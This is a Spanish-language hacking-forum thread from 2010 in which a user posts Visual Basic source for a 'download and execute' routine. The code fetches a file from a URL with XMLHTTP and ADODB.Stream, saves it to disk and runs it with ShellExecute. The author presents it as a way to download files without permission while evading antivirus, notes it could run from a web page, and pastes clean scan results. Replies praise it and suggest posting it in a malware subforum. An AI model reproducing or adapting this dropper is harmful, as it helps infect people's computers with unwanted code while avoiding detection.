elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  * [Source][SIN APIS] Descargar Archivos sin que salten los AV
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: * [Source][SIN APIS] Descargar Archivos sin que salten los AV  (Leído 4,435 veces)
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
* [Source][SIN APIS] Descargar Archivos sin que salten los AV
« en: 12 Enero 2010, 04:54 am »

El código es pequeño pero logra que no salte ningún Antivirus cuando se descarga un archivo sin permiso.

Ademas declarando otro objecto esencial para html se puede explotar directamente en una pagina web... ya que estas también ejecutan vbScript

Código
  1.  
  2. '
  3. ' ////////////////////////////////////////////////////////////////
  4. ' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
  5. ' //                                                            //
  6. ' // Web: http://InfrAngeluX.Sytes.Net/                         //
  7. ' //                                                            //
  8. ' // |-> Pueden Distribuir Este Código siempre y cuando         //
  9. ' // no se eliminen los créditos originales de este código      //
  10. ' // No importando que sea modificado/editado o engrandecido    //
  11. ' // o achicado, si es en base a este código                    //
  12. ' ////////////////////////////////////////////////////////////////
  13. Option Explicit
  14. Function DescargarArchivo(strDowload As String, SaveOn As String) As Long
  15. On Error GoTo 1:
  16. Dim xml                     As Object
  17. Dim adoStream               As Object
  18.    Set xml = CreateObject("Microsoft.XMLHTTP")
  19.    Set adoStream = CreateObject("Adodb.Stream")
  20.    Call xml.Open("GET", strDowload, 0)
  21.    Call xml.Send
  22.    adoStream.Type = 1
  23.    Call adoStream.Open
  24.    Call adoStream.write(xml.responseBody)
  25.    Call adoStream.SaveToFile(SaveOn, 2)
  26.    Call adoStream.Close
  27.    DescargarArchivo = 1
  28. Exit Function
  29. 1:
  30. End Function
  31.  
  32.  

Código del proyecto con el cual realice en el Scan.

Código
  1.  
  2. Option Explicit
  3. Sub main()
  4.    If CBool(DescargarArchivo("http://www.goear.com/files/sst2/mp3files/15102006/cfebd49f1b5ba43867cc687896a32ecd.mp3", "c:\aaa.mp3")) Then
  5.        Call vbShell("c:\aaa.mp3", False)
  6.    End If
  7. End Sub
  8. '
  9. ' ////////////////////////////////////////////////////////////////
  10. ' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
  11. ' //                                                            //
  12. ' // Web: http://InfrAngeluX.Sytes.Net/                         //
  13. ' //                                                            //
  14. ' // |-> Pueden Distribuir Este Código siempre y cuando         //
  15. ' // no se eliminen los créditos originales de este código      //
  16. ' // No importando que sea modificado/editado o engrandecido    //
  17. ' // o achicado, si es en base a este código                    //
  18. ' ////////////////////////////////////////////////////////////////
  19. Function vbShell(StrPath As String, visible As Long) As Long
  20. Dim ret                     As Object
  21.    Set ret = CreateObject("Shell.Application", "")
  22.    Call ret.ShellExecute(StrPath, "", "", "open", visible)
  23. End Function
  24.  
  25.  


lo he probado en un proyecto pequeño miren.

Gracias The Swash por el scan aunq que yo ya lo habia realizado xP

File Info

Report generated: 12.1.2010 at 0.41.15 (GMT 1)
Filename: Project1.exe
File size: 20480 bytes
MD5 hash: d64d53fa4ec3bcafb9ff781303188fb7
SHA1 hash: 62157077EA4D3C17B1988D72F69F8C9502F0026E
Detection rate: 0 on 24
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org



Virus total

Antivirus   Version   Last Update   Result
a-squared   4.5.0.48   2010.01.12   -
AhnLab-V3   5.0.0.2   2010.01.11   -
AntiVir   7.9.1.134   2010.01.11   -
Antiy-AVL   2.0.3.7   2010.01.11   -
Authentium   5.2.0.5   2010.01.12   -
Avast   4.8.1351.0   2010.01.11   -
AVG   9.0.0.725   2010.01.11   -
BitDefender   7.2   2010.01.12   -
CAT-QuickHeal   10.00   2010.01.11   -
ClamAV   0.94.1   2010.01.12   -
Comodo   3550   2010.01.11   -
DrWeb   5.0.1.12222   2010.01.12   -
eSafe   7.0.17.0   2010.01.11   -
eTrust-Vet   35.2.7231   2010.01.12   -
F-Prot   4.5.1.85   2010.01.12   -
F-Secure   9.0.15370.0   2010.01.12   -
Fortinet   4.0.14.0   2010.01.12   -
GData   19   2010.01.12   -
Ikarus   T3.1.1.80.0   2010.01.12   -
Jiangmin   13.0.900   2010.01.11   -
K7AntiVirus   7.10.944   2010.01.11   -
Kaspersky   7.0.0.125   2010.01.12   -
McAfee   5858   2010.01.11   -
McAfee+Artemis   5858   2010.01.11   -
McAfee-GW-Edition   6.8.5   2010.01.12   -
Microsoft   1.5302   2010.01.11   -
NOD32   4762   2010.01.11   -
Norman   6.04.03   2010.01.11   -
nProtect   2009.1.8.0   2010.01.11   -
Panda   10.0.2.2   2010.01.11   -
PCTools   7.0.3.5   2010.01.12   -
Prevx   3.0   2010.01.12   -
Rising   22.30.01.01   2010.01.12   -
Sophos   4.49.0   2010.01.12   -
Sunbelt   3.2.1858.2   2010.01.12   -
Symantec   20091.2.0.41   2010.01.12   -
TheHacker   6.5.0.3.147   2010.01.12   -
TrendMicro   9.120.0.1004   2010.01.11   -
VBA32   3.12.12.1   2010.01.12   -
ViRobot   2010.1.12.2131   2010.01.12   -
VirusBuster   5.0.21.0   2010.01.11   -

Dulces Lunas!¡.


« Última modificación: 12 Enero 2010, 05:12 am por ░▒▓BlackZeroҖ▓▒░ » En línea

The Dark Shadow is my passion.
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.696


🏴 Libertad!!!!!


Ver Perfil WWW
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #1 en: 12 Enero 2010, 05:52 am »

Orale esta bien el código y lo interesante es lo que comentas, seria una buena opcion linkear el tema a subforo de malware ya que ahi es donde mas interesa.

Saludos


En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #2 en: 12 Enero 2010, 07:53 am »

Código:
http://foro.elhacker.net/programacion_vb/source_downloader_sin_apis_sin_dlls_sin_ocxs_solo_una_funcion-t165233.5.html

Aun asi buen trabajo ;)
En línea

fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #3 en: 12 Enero 2010, 09:02 am »

Muy bueno...^^

salu2!
En línea

Un byte a la izquierda.
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #4 en: 12 Enero 2010, 09:08 am »

Código:
http://foro.elhacker.net/programacion_vb/source_downloader_sin_apis_sin_dlls_sin_ocxs_solo_una_funcion-t165233.5.html

Aun asi buen trabajo ;)

JAJAJA ni lo vi xp solo estaba leyendo algo de javascript y despues me fui a exploits y me dio una idea y el resultado arriba esta xP.

Dulces Lunas!¡.
En línea

The Dark Shadow is my passion.
ssccaann43 ©


Desconectado Desconectado

Mensajes: 792


¬¬


Ver Perfil
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #5 en: 12 Enero 2010, 16:11 pm »

Está muy bueno BlackZerox!
En línea

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"
seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #6 en: 13 Enero 2010, 03:09 am »

no hay nada como el AsyncDownload de los usercontrol... :)
En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #7 en: 13 Enero 2010, 05:16 am »

no hay nada como el AsyncDownload de los usercontrol... :)

Eso si me acuerdo que me entero por lo menos a mi es user Cobein en uno de sus Post... pero hay que ver igual otras posibilidades.!¡

P.D.: O era LeandroA... no recuerdo xd...!¡

Dulces Lunas!¡.
En línea

The Dark Shadow is my passion.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #8 en: 13 Enero 2010, 07:38 am »

no hay nada como el AsyncDownload de los usercontrol... :)

Eso si me acuerdo que me entero por lo menos a mi es user Cobein en uno de sus Post... pero hay que ver igual otras posibilidades.!¡

P.D.: O era LeandroA... no recuerdo xd...!¡

Dulces Lunas!¡.
Cobein:
Código:
http://foro.elhacker.net/programacion_vb/ucdownload_source-t222454.0.html
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: * [Source][SIN APIS] Descargar Archivos sin que salten los AV
« Respuesta #9 en: 14 Enero 2010, 13:26 pm »

Buenas

No quiero ser "duro" con la crítica, pero el método en si no es para nada nuevo, y de hecho, en el foro hay otros tantos códigos iguales a ese (en M$ support desde 2004 o antes).

Citar
Ademas declarando otro objecto esencial para html se puede explotar directamente en una pagina web... ya que estas también ejecutan vbScript
Solo IE acepta vbs, aunque el mismo código puede portarse a javascript, y tampoco tan así ... http://foro.elhacker.net/scripting/htmlvbsbatch_propagacion_a_traves_de_internet_posible-t221250.0.html

Por otra parte, alguien lo ha probado con el KIS? porque incrustado en un VBS/HTML es por demás detectado, y en VB debería de ser detectado por heurística.
:http://www.virustotal.com/analisis/697e756e37c60a3f077883ec8da0f21aec6f6f63773facfd4ca7ef0e639de21d-1263471785

Saludos

« Última modificación: 14 Enero 2010, 13:33 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
LinkedIn lanza una 'app' para ayudar a los estudiantes antes de que salten al...
Noticias
wolfbcn 0 805 Último mensaje 18 Abril 2016, 21:55 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines